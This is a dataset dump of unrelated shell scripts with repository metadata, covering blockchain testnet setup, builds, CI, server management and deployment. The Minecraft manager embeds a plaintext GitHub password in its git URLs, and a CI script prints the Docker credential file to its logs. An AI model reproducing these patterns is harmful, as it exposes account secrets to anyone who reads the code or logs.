echo "#!/usr/bin/env bash" > run/all.sh
echo "" >> run/all.sh
chmod a+x run/all.sh
for NODE in ${BFT_NODES}; do
echo "$ROOT/run/${NODE}.sh &" >> run/all.sh
done
for NODE in ${POOL_NODES}; do
echo "$ROOT/run/${NODE}.sh &" >> run/all.sh
done
echo "" >> run/all.sh
echo "wait" >> run/all.sh
chmod a+x run/all.sh
echo
echo "Alternatively, you can run all the nodes in one go:"
echo
echo "$ROOT/run/all.sh"
echo
echo "In order to do the protocol updates, proceed as follows:"
echo
echo " 0. wait for the nodes to start producing blocks"
echo " 1. invoke ./scripts/byron-to-alonzo/update-1.sh"
echo " wait for the next epoch for the update to take effect"
echo
echo " 2. invoke ./scripts/byron-to-alonzo/update-2.sh"
echo " 3. restart the nodes"
echo " wait for the next epoch for the update to take effect"
echo
echo " 4. invoke ./scripts/byron-to-alonzo/update-3.sh <N>"
echo " Here, <N> the current epoch (2 if you're quick)."
echo " If you provide the wrong epoch, you will see an error"
echo " that will tell you the current epoch, and can run"
echo " the script again."
echo " 5. restart the nodes"
echo " wait for the next epoch for the update to take effect"
echo " 6. invoke ./scripts/byron-to-alonzo/update-4.sh <N>"
echo " 7. restart the nodes"
echo
echo "You can observe the status of the updates by grepping the logs, via"
echo
echo " grep LedgerUpdate ${ROOT}/node-pool1/node.log"
echo
echo "When in Shelley (after 3, and before 4), you should be able "
echo "to look at the protocol parameters, or the ledger state, "
echo "using commands like"
echo
echo "CARDANO_NODE_SOCKET_PATH=${ROOT}/node-bft1/node.sock \\"
echo " cardano-cli query protocol-parameters \\"
echo " --cardano-mode --testnet-magic 42"
echo
echo "This will fail outside of the Shelley era. In particular, "
echo "after step 3, you will get an error message that tells you "
echo "that you are in the Allegra era. You must then use the --allegra-era flag:"
echo
echo "CARDANO_NODE_SOCKET_PATH=${ROOT}/node-bft1/node.sock \\"
echo " cardano-cli query protocol-parameters \\"
echo " --cardano-mode --allegra-era --testnet-magic 42"
echo
echo "Similarly, use --mary-era in the Mary era."
popd
# For an automatic transition at epoch 0, specifying mary, allegra or shelley
# will start the node in the appropriate era.
echo ""
# These are needed for cardano-submit-api
echo "EnableLogMetrics: False" >> ${ROOT}/configuration.yaml
echo "EnableLogging: True" >> ${ROOT}/configuration.yaml
# Select the starting era from the first CLI argument (shelley, allegra,
# mary or alonzo). Bug fix: read it through ${1:-} -- the script runs under
# `set -u`, so a bare "$1" aborted with "unbound variable" whenever the
# script was invoked with no argument, even though the no-argument default
# (plain Byron configuration) is explicitly supported.
era="${1:-}"
if [ "$era" = "alonzo" ]; then
  echo "TestShelleyHardForkAtEpoch: 0" >> ${ROOT}/configuration.yaml
  echo "TestAllegraHardForkAtEpoch: 0" >> ${ROOT}/configuration.yaml
  echo "TestMaryHardForkAtEpoch: 0" >> ${ROOT}/configuration.yaml
  echo "TestAlonzoHardForkAtEpoch: 0" >> ${ROOT}/configuration.yaml
  echo "TestEnableDevelopmentHardForkEras: True" >> ${ROOT}/configuration.yaml
  echo "TestEnableDevelopmentNetworkProtocols: True" >> ${ROOT}/configuration.yaml
  sed -i ${ROOT}/configuration.yaml \
      -e 's/LastKnownBlockVersion-Major: 1/LastKnownBlockVersion-Major: 5/'
  # Copy the cost model
  mkdir ${ROOT}/shelley/alonzo
  cp configuration/cardano/alonzo/shelley_qa_cost-model.json ${ROOT}/shelley/alonzo/costmodel.json
  echo "Nodes will start in Alonzo era from epoch 0"
elif [ "$era" = "mary" ]; then
  echo "TestShelleyHardForkAtEpoch: 0" >> ${ROOT}/configuration.yaml
  echo "TestAllegraHardForkAtEpoch: 0" >> ${ROOT}/configuration.yaml
  echo "TestMaryHardForkAtEpoch: 0" >> ${ROOT}/configuration.yaml
  sed -i ${ROOT}/configuration.yaml \
      -e 's/LastKnownBlockVersion-Major: 1/LastKnownBlockVersion-Major: 4/'
  echo "Nodes will start in Mary era from epoch 0"
elif [ "$era" = "allegra" ]; then
  echo "TestShelleyHardForkAtEpoch: 0" >> ${ROOT}/configuration.yaml
  echo "TestAllegraHardForkAtEpoch: 0" >> ${ROOT}/configuration.yaml
  sed -i ${ROOT}/configuration.yaml \
      -e 's/LastKnownBlockVersion-Major: 1/LastKnownBlockVersion-Major: 3/'
  echo "Nodes will start in Allegra era from epoch 0"
elif [ "$era" = "shelley" ]; then
  echo "TestShelleyHardForkAtEpoch: 0" >> ${ROOT}/configuration.yaml
  sed -i ${ROOT}/configuration.yaml \
      -e 's/LastKnownBlockVersion-Major: 1/LastKnownBlockVersion-Major: 2/'
  echo "Nodes will start in Shelley era from epoch 0"
else
  echo "Default yaml configuration applied."
fi
| true |
1ede94debada6af03249685c438e333a7ef2717e | Shell | phoenixlabcn/fortran-ios | /build_llc.sh | UTF-8 | 347 | 2.765625 | 3 | [] | no_license | #!/bin/bash
# Build the LLVM `llc` tool from the classic-flang checkout with Xcode and
# stage the resulting binary into ../build/bin.
cd classic-flang-llvm-project
mkdir -p build
cd build
# Generate the Xcode project only once; later runs reuse it.
if [ ! -e "LLVM.xcodeproj" ]; then
cmake -G Xcode ../llvm
fi
BIN_PATH="Debug/bin/llc"
# NOTE(review): the build writes its products under SYMROOT=../../build_llc,
# yet BIN_PATH points inside the local build/ tree -- confirm which location
# the binary actually lands in before relying on this check.
if [ ! -e "$BIN_PATH" ]; then
xcodebuild ONLY_ACTIVE_ARCH=NO -scheme llc -sdk macosx build SYMROOT=../../build_llc
fi
rm -rf ../../build_llc
# NOTE(review): the leading `yes |` is redundant -- `cp -f` never prompts.
yes | cp -rf "$BIN_PATH" ../../build/bin
| true |
f408bc27e5e84933e38c089cb6df6bb0b546ab8a | Shell | albertywu/buildkite | /flow.sh | UTF-8 | 445 | 2.796875 | 3 | [] | no_license | #!/bin/bash
set -ex
# Load shared CI helpers (provides util_install_yarn_cache_tarball).
. utils.sh
# NOTE(review): printing ~/.docker/config.json presumably serves debugging,
# but it can leak registry auth entries into the CI log -- consider removing.
cat ~/.docker/config.json
# volume-mount a yarn cache dir, to prevent excessive uNPM calls
# Requires $PROJECT and $BUILD_IMAGE to be provided by the CI environment.
util_install_yarn_cache_tarball $PROJECT
# get the yarn cache directory inside the docker container
YARN_CACHE_DIR=$(docker run --rm "$BUILD_IMAGE" bash -c 'yarn cache dir')
# Run CI and the flow type-check inside the build image, sharing the host's
# .yarn_cache so repeated runs reuse downloaded packages. The heredoc
# delimiter is unquoted, so $PROJECT expands on the host before docker runs.
docker run -v ${PWD}/.yarn_cache:$YARN_CACHE_DIR -i --rm $BUILD_IMAGE bash <<CMD
jazelle ci --cwd $PROJECT
jazelle flow --cwd $PROJECT
CMD
| true |
628e91656a77f61cace1f5d91769aff1b3cebaf1 | Shell | ErwanAliasr1/skydive | /scripts/ci/tripleo-tests.sh | UTF-8 | 1,509 | 3.03125 | 3 | [
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | #!/bin/bash
set -e
# Credentials for the skydive analyzer deployed on the overcloud (test env).
USERNAME=skydive
PASSWORD=secret
# Undercloud credentials: needed to look up the controller's address.
. ~/stackrc
# Extract the controller IP from the "addresses" field (presumably formatted
# as "network=IP", hence the cut on '=' -- verify against the deployment).
CTLIP=$( openstack server show overcloud-controller-0 -f json | jq -r .addresses | cut -d '=' -f 2 )
AGENTS_COUNT=$( SKYDIVE_ANALYZERS=$CTLIP:8082 /home/stack/skydive client status --username $USERNAME --password $PASSWORD | jq '.Agents | length' )
# At least two skydive agents must have registered with the analyzer.
if [ $AGENTS_COUNT -lt 2 ]; then
echo Expected agent count not found
# Re-run the status call so its raw output lands in the log for debugging.
SKYDIVE_ANALYZERS=$CTLIP:8082 /home/stack/skydive client status --username $USERNAME --password $PASSWORD
exit 1
fi
# Switch to overcloud credentials to create tenant-side test resources.
. ~/overcloudrc
curl -o /tmp/cirros.img http://download.cirros-cloud.net/0.4.0/cirros-0.4.0-x86_64-disk.img
openstack image create --public --file /tmp/cirros.img --disk-format raw cirros
openstack flavor create --vcpus 1 --ram 64 --disk 1 --public tiny
NETID=$( openstack network create private -f json | jq -r .id )
openstack subnet create --subnet-range 10.0.0.0/24 --network $NETID private
# FIX(safchain) currently openstack volume client is broken, so can't boot a VM
# will restore it once fixed
#openstack server create --image cirros --flavor tiny --nic net-id=$NETID vm1
# for now, one ns with dhcp agent, on container for the dhcp agent, one ns for the network created and
# one tap for the network as well.
EXPECTED=4
# Poll the skydive graph for up to 30 * 5s = 150s until exactly EXPECTED
# neutron-managed interfaces are visible; exit 0 on success, 1 on timeout.
for i in {1..30}; do
INTF_COUNT=$( SKYDIVE_ANALYZERS=$CTLIP:8082 \
/home/stack/skydive client query "G.V().Has('Manager', 'neutron').Count()" --username $USERNAME --password $PASSWORD )
if [ $INTF_COUNT -eq $EXPECTED ]; then
exit 0
fi
sleep 5
done
exit 1
| true |
6059fa823d9f8b56a02326a6c215b04de90f9217 | Shell | 1484-minecraft/1.15.2 | /manager | UTF-8 | 4,147 | 3.5625 | 4 | [] | no_license | #!/bin/bash
# /etc/init.d/minecraft
# Author by Nav Vasky
# Modified by KJie
### BEGIN INIT INFO
# Provides: MineCraft
# Required-Start: $local_fs $remote_fs screen-cleanup
# Required-Stop: $local_fs $remote_fs
# Should-Start: $network
# Should-Stop: $network
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: MineCraft server
# Description: Starts the MineCraft server
### END INIT INFO
#Settings
SERVICE='spigot.jar' #The name of the jar file used to boot the server, also the name of the process
SCREENNAME='minecraft' #The tmux session name (the functions below use tmux, not screen)
OPTIONS='nogui' #Optional arguments for MineCraft
USERNAME='tom2003611' #The user name of the Linux account to be used
WORLD='world' #The selected world to load when the server boots (NOTE(review): unused below)
# MCPATH="/home/$USERNAME/server/$1/" #The file path for the directory where the server jar is held
MCPATH="./" #The file path for the directory where the server jar is held
MAXHEAP=2048 #The maximum amount of ram allocated to the server
MINHEAP=1572 #The minimum amount of ram allocated to the server
# INVOCATION="java -Xms${MINHEAP}M -Xmx${MAXHEAP}M -XX:+UseConcMarkSweepGC -jar $SERVICE $OPTIONS"
INVOCATION="java -Xms${MINHEAP}M -Xmx${MAXHEAP}M -jar $SERVICE $OPTIONS"
ME=`whoami`
# NOTE(review): an earlier comment here claimed the script verifies that the
# correct user ($USERNAME) is running it and switches user otherwise; no such
# check is implemented -- every action runs as the invoking user ($ME).
#Starts the MineCraft Server
# Pulls the latest world data from GitHub, then launches the server jar
# inside a detached tmux session ($SCREENNAME) and verifies it came up.
mc_start() {
if pgrep -u $ME -f $SERVICE > /dev/null #Checks if the server is already running
then
echo "$SERVICE is already running!"
else
# SECURITY NOTE(review): the URL embeds a plaintext username/password;
# move the credential into a git credential helper or an SSH deploy key.
git pull https://1484-minecraft:staythefuckathome@github.com/1484-minecraft/1.15.2
echo "Starting $SERVICE..."
cd $MCPATH
# NOTE(review): the cd above is redundant -- the next line changes into
# $MCPATH again before starting the tmux session.
cd $MCPATH && tmux new-session -d -s $SCREENNAME $INVOCATION #Starts the server
sleep 3
if pgrep -u $ME -f $SERVICE > /dev/null #Checks if the service started or not
then
echo "$SERVICE is now running."
else
echo "Error! Could not start $SERVICE!"
fi
fi
}
#Turns off saving of the server
# Warns players, disables world auto-saving, forces a final save-all, and
# syncs the filesystem so an external backup sees a consistent world state.
mc_saveoff() {
if pgrep -u $ME -f $SERVICE > /dev/null
then #Checks if the server is running, then it alerts the users
echo "$SERVICE is running... suspending saves"
tmux send-keys -t $SCREENNAME "say SERVER BACKUP STARTING. Server going readonly" ENTER
tmux send-keys -t $SCREENNAME "save-off" ENTER
tmux send-keys -t $SCREENNAME "save-all" ENTER
sync
# Give the server time to finish flushing the world to disk.
sleep 10
else
echo "$SERVICE is not running. Not suspending saves."
fi
}
#Turns on the saving of the server
# Re-enables world auto-saving after a backup and notifies players.
mc_saveon() {
if pgrep -u $ME -f $SERVICE > /dev/null
then #Checks if the server is running, then it alerts the users
echo "$SERVICE is running... re-enabling saves"
tmux send-keys -t $SCREENNAME "save-on" ENTER
tmux send-keys -t $SCREENNAME "say SERVER BACKUP ENDED. Server going read-write..." ENTER
else
echo "$SERVICE is not running. Not resuming saves."
fi
}
#Stops the server
# Saves the world, issues "stop" to the server console, waits for the
# process to exit, then commits and pushes the world data back to GitHub.
mc_stop() {
if pgrep -u $ME -f $SERVICE > /dev/null
then #Alerts the users on the server of incoming server shut down
echo "Stopping $SERVICE"
# NOTE(review): the broadcast promises a 10 second delay, but the matching
# `sleep 10` below is commented out, so "stop" is sent immediately.
tmux send-keys -t $SCREENNAME "say SERVER SHUTTING DOWN IN 10 SECONDS. Saving map..." ENTER
tmux send-keys -t $SCREENNAME "save-all" ENTER
tmux send-keys -t $SCREENNAME "" ENTER
# sleep 10
tmux send-keys -t $SCREENNAME "stop" ENTER
# sleep 7
# NOTE(review): this busy-wait spins at full CPU until the process exits;
# adding a short sleep in the loop body would be kinder to the host.
while /usr/bin/pgrep -u $ME -f $SERVICE > /dev/null; do :; done
echo "$SERVICE is stopped."
else
echo "$SERVICE was not running."
fi
# if pgrep -u $ME -f $SERVICE > /dev/null #Checks if the server is still running
# then
# echo "Error! $SERVICE could not be stopped."
# else
# echo "$SERVICE is stopped."
# fi
# SECURITY NOTE(review): plaintext credentials are embedded in the push URL
# below; use a credential helper or deploy key instead of hard-coding them.
git add --all
git commit -m 'update'
git push https://1484-minecraft:staythefuckathome@github.com/1484-minecraft/1.15.2
}
#Start-Stop here
# Dispatch on the first CLI argument. ${1:-} keeps the no-argument case
# well-defined (it falls through to the usage message).
case "${1:-}" in
  start)
    mc_start
    ;;
  stop)
    mc_stop
    ;;
  restart)
    mc_stop
    mc_start
    ;;
  status)
    # Report whether the server process is currently alive.
    if pgrep -u $ME -f $SERVICE > /dev/null
    then
      echo "$SERVICE is running."
    else
      echo "$SERVICE is not running."
    fi
    ;;
  *)
    # Bug fix: the old usage string advertised "backup" and "command"
    # actions that this case statement never implemented.
    echo "Usage: $0 {start|stop|restart|status}"
    exit 1
    ;;
esac
exit 0
| true |
630bbbe7ea9ab9efb41bb93867def6190355dd9e | Shell | FauxFaux/debian-control | /k/kopano-webapp/kopano-webapp-common_3.5.0+dfsg1-1_all/postinst | UTF-8 | 1,661 | 3.5 | 4 | [] | no_license | #!/bin/sh
# postinst script for kopano-webapp
# see: dh_installdeb(1)
# summary of how this script can be called:
# --- $1 --- --- $2 --- --- $3 --- --- $4 ---
# <new-postinst> 'configure' <most-recently-configured-version>
# <old-postinst> 'abort-upgrade' <new version>
# <conflictor's-postinst> 'abort-remove' 'in-favour' <package> <new-version>
# <postinst> 'abort-remove'
# <deconfigured's-postinst> 'abort-deconfigure' 'in-favour' <failed-install-package> <version> 'removing' <conflicting-package> <version>
#
# for details, see http://www.debian.org/doc/debian-policy/ or the
# debian-policy package
set -e
#set -x # uncomment for verbose output
PACKAGE_NAME="kopano-webapp"
PACKAGE_ETC_FOLDER="/etc/kopano/webapp"
PACKAGE_VAR_FOLDER="/var/lib/kopano-webapp/tmp"
# NOTE(review): the three variables above are only referenced by the
# commented-out dpkg-statoverride line below; they are otherwise unused.
case "$1" in
configure)
# check permissions on /var/lib/kopano-webapp/tmp
#dpkg-statoverride --add --update www-data www-data 0750 ${PACKAGE_VAR_FOLDER}
# check first for snakeoil key and certificate
echo "Updating default SSL certificate settings, if any..." >&2
# Generate the self-signed ("snakeoil") pair only when either half is
# missing, so an existing certificate is never overwritten.
if [ ! -e "/etc/ssl/certs/ssl-cert-snakeoil.pem" ] || \
[ ! -e "/etc/ssl/private/ssl-cert-snakeoil.key" ];
then
echo "Create snakeoil CA and key for kopano-webapp ..." >&2
make-ssl-cert generate-default-snakeoil
fi
;;
abort-upgrade|abort-remove|abort-deconfigure)
;;
*)
echo "postinst called with unknown argument \`$1'" >&2
exit 1
;;
esac
exit 0
| true |
15cb85a2867c2e69d036a020b9c22815a8a65675 | Shell | wuding-card/Wuding-legacy | /.husky/prepare-commit-msg | UTF-8 | 528 | 3.28125 | 3 | [
"MIT"
] | permissive | #!/bin/sh
. "$(dirname "$0")/_/husky.sh"
# Git prepare-commit-msg hook: run the gitmoji CLI so an emoji can be
# added to the commit message before the editor opens.
# NOTE(review): [[ and == below are bash-specific; confirm the hook's
# shebang is bash rather than plain sh.
if [[ "$OSTYPE" == "msys" ]]; then
# Windows workaround for <https://github.com/carloscuesta/gitmoji-cli/issues/211>
# Launch gitmoji in a separate Windows Terminal window, then poll the
# commit-message file until its checksum changes (gitmoji rewrote it).
sum1=$(md5sum .git/COMMIT_EDITMSG)
echo calling gitmoji
wt --window 0 -p cmd -d "$(pwd)" pwsh -NoProfile -Command "npx gitmoji --hook .git/COMMIT_EDITMSG"
while true
do
sum2=$(md5sum .git/COMMIT_EDITMSG)
if [ "$sum1" == "$sum2" ];
then
# Message file unchanged so far; keep waiting.
sleep 1
else
break
fi
done
else
# Re-attach stdin to the terminal so gitmoji can prompt interactively;
# '|| true' keeps the hook from failing the commit when gitmoji is absent.
exec < /dev/tty && npx gitmoji --hook $1 $2 || true
fi
| true |
79328362eaedda36070f6367d6d931ec8d3529df | Shell | ndonolli/mySite | /publish.sh | UTF-8 | 539 | 3.359375 | 3 | [] | no_license | #!/bin/bash
# Script to automatically publish the site to the github pages repo
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" # gets directory of this bash script
# Refuse to run unless invoked from the repo root: the hugo/git commands
# below all rely on relative paths.
if [[ $PWD != $DIR ]]
then
echo "Error: Current working directory is not the main website repo directory"
exit 1
fi
# Build the site (hemingway theme) into ./public.
hugo -t hemingway
# Commit and push the generated site from the public/ subrepo.
cd "${PWD}/public"
git add .
git commit -m "site build $(date)"
# Load the SSH key in a throwaway agent just for this push.
ssh-agent bash -c "ssh-add /Users/ndonolli/.ssh/id_rsa; git push origin master"
# Back in the main repo: record the updated public/ pointer and push.
cd ..
git add public
git commit -m "site build $(date)"
git push origin master
| true |
7239d2b06f5518822c9972102314f2bb6966b588 | Shell | TuckerHaydon/config | /exe/install_all.sh | UTF-8 | 357 | 3.34375 | 3 | [] | no_license | #!/bin/bash
# Determine location of this file and, from it, the repository root
# (the parent of the directory containing this script).
# Quoting every expansion fixes breakage on paths containing spaces.
CONFIG_DIR="$(realpath "$(cd "$(dirname "${BASH_SOURCE[0]}")" >/dev/null 2>&1 && pwd)/..")"

# Helper variables
EXE_DIR="${CONFIG_DIR}/exe"

# Install submodules. Abort if we cannot enter the repo: the original
# ignored cd failures, letting the installers run in the wrong directory.
cd "${CONFIG_DIR}" || exit 1
git submodule update --init --recursive

# Install components
cd "${EXE_DIR}" || exit 1
./install_vim.sh
./install_tmux.sh
./install_zsh.sh
| true |
2726bbb63726dbcf563c464cde6e3b13343ebdf9 | Shell | AfzaalLucky/hlf-k8s-custom-crypto | /start-fabric.sh | UTF-8 | 2,994 | 3.109375 | 3 | [] | no_license | #!/bin/bash
# This script brings up a local version of the Hyperledger Fabric Network.
# Stages: Zookeeper -> Kafka -> CouchDB -> Orderer -> Peers -> CLI job,
# with fixed sleeps between stages so the pods have time to come up.

echo "============== Starting Fabric Services ================"
echo "- Creating Fabric Supporting Services"
echo ""

# Zookeeper ensemble: create the service + deployment for each of the
# three nodes (replaces three copy-pasted stanzas with one loop).
for i in 0 1 2; do
  echo " - Zookepeer Services: kubectl create -f fabric-zookeeper${i}-service.yaml"
  kubectl create -f fabric-zookeeper${i}-service.yaml
  echo " - Zookeeper Deployments: kubectl create -f fabric-zookeeper${i}-deployment.yaml"
  kubectl create -f fabric-zookeeper${i}-deployment.yaml
done

echo " - [waiting 5s]"
sleep 5

# Kafka cluster: service + deployment for each of the four brokers.
for i in 0 1 2 3; do
  echo " - Kafka Services: kubectl create -f fabric-kafka${i}-service.yaml"
  kubectl create -f fabric-kafka${i}-service.yaml
  echo " - Kafka Deployments: kubectl create -f fabric-kafka${i}-deployment.yaml"
  kubectl create -f fabric-kafka${i}-deployment.yaml
done

# Create couchdb
echo " - CouchDb Service: kubectl create -f fabric-couchdb.yaml"
kubectl create -f fabric-couchdb.yaml
echo " - [waiting 5s]"
sleep 5s

# Create Orderer
echo " - Orderer Service: kubectl create -f fabric-orderer.yaml"
kubectl create -f fabric-orderer.yaml
echo " - [waiting 5s]"
sleep 5s

# Create the peer services for both organisations.
echo "- Creating Fabric Services..."
for S_FABRIC_SERVICE in fabric-peer0-org1.yaml \
  fabric-peer1-org1.yaml \
  fabric-peer0-org2.yaml \
  fabric-peer1-org2.yaml
do
  echo " - Creating Service ${S_FABRIC_SERVICE}: kubectl create -f ${S_FABRIC_SERVICE}"
  kubectl create -f ${S_FABRIC_SERVICE}
done

echo ""
echo " - [waiting 20s for Fabric network nodes to sync ]"
sleep 20s

# Launch the CLI job and stream its logs until it finishes.
kubectl create -f fabric-cli-job.yaml
echo " - [waiting 10s for cli container to create ]"
sleep 10s
echo "======================= [DONE] ========================="
kubectl logs -f $(kubectl get pod --selector io.kompose.job=cli -o name)
| true |
7f6141654bfc9d3fe6dcfa67893f41e5b5c2ff06 | Shell | hussainamir/python-snap7 | /.travis/before_install.sh | UTF-8 | 165 | 2.734375 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
# Travis CI before_install step: macOS needs the snap7 library from
# Homebrew; Linux needs nothing extra.
set -v
set -e

case "$TRAVIS_OS_NAME" in
  osx)
    brew install snap7
    ;;
  linux)
    echo "nothing"
    ;;
esac
| true |
7552ddc79dbd6fd884618bfda2a4faf9184daf9d | Shell | mionsan/shell | /bin/update_zabbix_agentd | UTF-8 | 807 | 3.125 | 3 | [] | no_license | #!/bin/bash
# Push the local Zabbix agent setup to a remote host and restart the
# agent there. Usage: update_zabbix_agentd <host>
HOST=$1
# NOTE(review): CONFDIR and USERDIR are never used below - the scp calls
# hardcode the paths instead. Confirm whether they can be removed.
CONFDIR=/etc/zabbix
USERDIR=/etc/zabbix/zabbix_agentd.d
# install zabbix agentd
#ssh ${HOST} "yum -y install php php-mysql zabbix22-agent sysstat bc"
# deploy plugin scripts
# Copy every executable plugin script found under /etc/zabbix.
# NB: word-splitting the backtick output breaks on paths with spaces.
for i in `find /etc/zabbix -executable -type f`; do
scp ${i} ${HOST}:/etc/zabbix
done
# deploy conf file
scp /etc/zabbix/zabbix_agentd.conf ${HOST}:/etc/zabbix
scp -r /etc/zabbix/zabbix_agentd.d ${HOST}:/etc/zabbix
scp /root/setup/mysql/zabbix/.my.cnf ${HOST}:/var/lib/zabbix
scp -r /var/lib/zabbix/percona ${HOST}:/var/lib/zabbix
# start zabbix agentd
echo "Starting zabbix agentd"
ssh ${HOST} "/etc/init.d/zabbix-agentd restart && chkconfig zabbix-agentd on"
#chkconfig zabbix-agentd on
# check log
echo "Zabbix Agentd Logs come after here"
echo "..."
ssh ${HOST} "tail /var/log/zabbix/zabbix_agentd.log"
| true |
69ec1bf9500ad7368c444df778fe7681e5b17e30 | Shell | xue-yuan/dotfiles | /.bash_profile | UTF-8 | 1,211 | 3.109375 | 3 | [
"MIT"
] | permissive | eval "$(pyenv init --path)"
# pyenv: root dir and binaries on PATH (pyenv itself is initialised above).
export PYENV_ROOT="$HOME/.pyenv"
export PATH="$PYENV_ROOT/bin:$PATH"
# Flutter SDK.
export PATH="$PATH:$HOME/workspace/flutter/bin"
# Go toolchain: workspace, GOROOT under the Homebrew prefix, module mode on.
export GOPATH=$HOME/workspace/go
export GOROOT="/usr/local/opt/go/libexec"
# export GOROOT="$(brew --prefix golang)/libexec"
export PATH="$PATH:${GOPATH}/bin:${GOROOT}/bin"
export GO111MODULE=on
# Ruby (RVM) and Node (nvm) version managers.
export PATH="$PATH:$HOME/.rvm/bin"
export NVM_DIR="$HOME/.nvm"
[[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm" # Load RVM into a shell session *as a function*
[ -s "/usr/local/opt/nvm/nvm.sh" ] && . "/usr/local/opt/nvm/nvm.sh" --no-use # This loads nvm
[ -s "/usr/local/opt/nvm/etc/bash_completion.d/nvm" ] && . "/usr/local/opt/nvm/etc/bash_completion.d/nvm" # This loads nvm bash_completion
# The next line updates PATH for the Google Cloud SDK.
# NOTE(review): the gcloud snippets sourced below are the *.zsh.inc zsh
# variants - confirm this profile is actually loaded by zsh, not bash.
if [ -f '/Users/denon/google-cloud-sdk/path.zsh.inc' ]; then . '/Users/denon/google-cloud-sdk/path.zsh.inc'; fi
# The next line enables shell command completion for gcloud.
if [ -f '/Users/denon/google-cloud-sdk/completion.zsh.inc' ]; then . '/Users/denon/google-cloud-sdk/completion.zsh.inc'; fi
# Benchmark shell startup: time 10 interactive launches of $1 (or $SHELL).
timezsh() {
shell=${1-$SHELL}
for i in $(seq 1 10); do /usr/bin/time $shell -i -c exit; done
}
| true |
3bcb45aedd2bc196ac0ebc80cb1e948ca841ff44 | Shell | vklimov1976/bash | /task01.sh | UTF-8 | 194 | 3.328125 | 3 | [] | no_license | #!/bin/bash
# Prompt for the user's name and greet them; exit 1 if nothing was entered.
# (User-facing strings are intentionally in Russian.)
echo -n "Введите свое имя:"
# NB: plain `read` (no -r) interprets backslashes in the typed input.
read user_name
if [ -n "$user_name" ]; then
echo "Привет $user_name!"
exit 0
else
echo "Вы не ввели имя!"
exit 1
fi
| true |
e5612e0c2fe03fd19b02314ac25626ba4021941b | Shell | andmos/SimpleNetworkServer | /bin/lib.sh | UTF-8 | 996 | 3.890625 | 4 | [
"MIT"
] | permissive | #!/usr/bin/env bash
# Shared helpers for the install scripts: colored logging, apt installs,
# a root check and small utilities. Intended to be sourced.

export DEBIAN_FRONTEND=noninteractive

# COLORS - ANSI escape sequences stored as literal '\x1b' strings;
# printf '%b' below expands them at print time.
COL_BLUE="\x1b[34;01m"
COL_RESET="\x1b[39;49;00m"
COL_RED="\x1b[31;01m"
COL_YELLOW="\x1b[33;01m"
COL_GRAY="\x1b[0;37m"

# TEMP DIR FOR INSTALLS
temp_dir='/tmp/src'
mkdir -p "$temp_dir"

# Mirror all subsequent stdout into "log-<name>.log" while still printing it.
_redirect_stdout() {
exec > >(tee "log-$1.log")
}

# Blue level-1 heading. The message is now a printf *argument* instead of
# part of the format string, so '%' characters in it can no longer corrupt
# the output; '%b' still expands backslash escapes exactly as before.
_print_h1() {
printf '%b\n▽ %b\n%b' "$COL_BLUE" "$1" "$COL_RESET"
}

# Yellow level-2 heading.
_print_h2() {
printf '%b\n× %b\n%b' "$COL_YELLOW" "$1" "$COL_RESET"
}

# Plain gray message.
_print() {
printf '%b\n%b\n%b' "$COL_GRAY" "$1" "$COL_RESET"
}

# Red error message. Quoting the argument fixes the original bug where a
# multi-word message was word-split and only its first word was printed.
_error() {
_print "${COL_RED}Error:\n$1\n"
}

# Install apt package(s) named in $1; returns 1 if no name is given.
_system_installs_install() {
[[ -z "$1" ]] && return 1
_print_h2 "Install $1"
# $1 intentionally unquoted: a space-separated list installs several packages.
sudo DEBIAN_FRONTEND=noninteractive apt-get -qq -y -f install $1
}

# Abort unless running as root. Now exits with status 1: the original
# exited 0 on this error path, making the failure invisible to callers.
_check_root() {
if [ "$(/usr/bin/id -u)" != "0" ]; then
_error 'Must be run by root user'
exit 1
fi
}

# Remove a copied-in lib.sh from the current directory, if present.
_cleanup_lib() {
if [ -f "./lib.sh" ]; then
rm ./lib.sh
fi
}

# Record that component $1 finished installing.
_note_installation() {
touch "$HOME/$1-installed"
}

# Current time as Unix epoch seconds. Replaces the BSD/macOS-only
# 'date -j -f' round-trip (which fails on Linux) with the portable
# equivalent 'date +%s'.
_unix_time() {
date +%s
}
| true |
6c871f4af4967ba852e785c0d4e88c0df4860e0f | Shell | o2346/happy-scripts | /ggr.sh | UTF-8 | 938 | 3.53125 | 4 | [
"MIT"
] | permissive | #!/bin/bash
# --------------------------------------
# Google search from terminal
# --------------------------------------
# http://unix.stackexchange.com/questions/159166/can-i-pass-commands-to-vimperator-firefox-through-the-command-line
#
# Usage: ggr [-c|-f|-s] <search terms...>
#   -c Chrome, -f Firefox, -s Safari (macOS only; default browser otherwise).
ggr(){
# BUG FIX: the original stored the browser flag in "opt" and then
# immediately clobbered it with the query options, so -c/-f/-s never
# took effect. Keep the two values in separate variables.
local browser=""
case "$1" in
-c|-f|-s)
browser="$1"
shift
;;
esac
local opt="safe=off&num=16"
# Remaining args become the query; spaces turn into '+'.
local queries="&q=${*// /+}"
# Domains to exclude from the results.
local noises="+-weblio.jp+-matome.naver.jp+-cookpad.com+-itpro.nikkeibp.co.jp+-rakuten.co.jp"
local url="https://www.google.co.jp/search?${opt}${queries}${noises}"
if [ "$(uname)" = 'Darwin' ]; then
local app="/Applications"
local c="${app}/Google Chrome.app"
local f="${app}/Firefox.app"
local s="${app}/Safari.app"
case "${browser}" in
"-c") open "${url}" -a "$c";;
"-f") open "${url}" -a "$f";;
"-s") open "${url}" -a "$s";;
*) open "${url}";;
esac
else
firefox "$url"
fi
}
ggr "$@"
| true |
9ad8260377884aea4c6045b07e83e26cd5b4ad45 | Shell | maxtrem/pronouns | /scripts/shell_scripts/download_jw300.sh | UTF-8 | 329 | 2.84375 | 3 | [] | no_license | #!/bin/sh
# Download the JW300 parallel corpus for a language pair with opus_read.
# Usage: download_jw300.sh <lang1> <lang2> <opus_read-path> <output-dir>
BIN_PATH=$3
DIR=$4
L1=$1
L2=$2

echo "Downloading JW300 for languages: $L1 and $L2"

# Quote all expansions: the original unquoted variables broke on paths
# containing spaces and on missing arguments.
"$BIN_PATH" -d JW300 \
--source "$L1" \
--target "$L2" \
--write_mode moses \
--suppress_prompts \
--write "$DIR/jw300.$L1-$L2.$L1" "$DIR/jw300.$L1-$L2.$L2"

# Remove the raw XML archives that opus_read leaves behind.
rm JW300_latest_xml_*
| true |
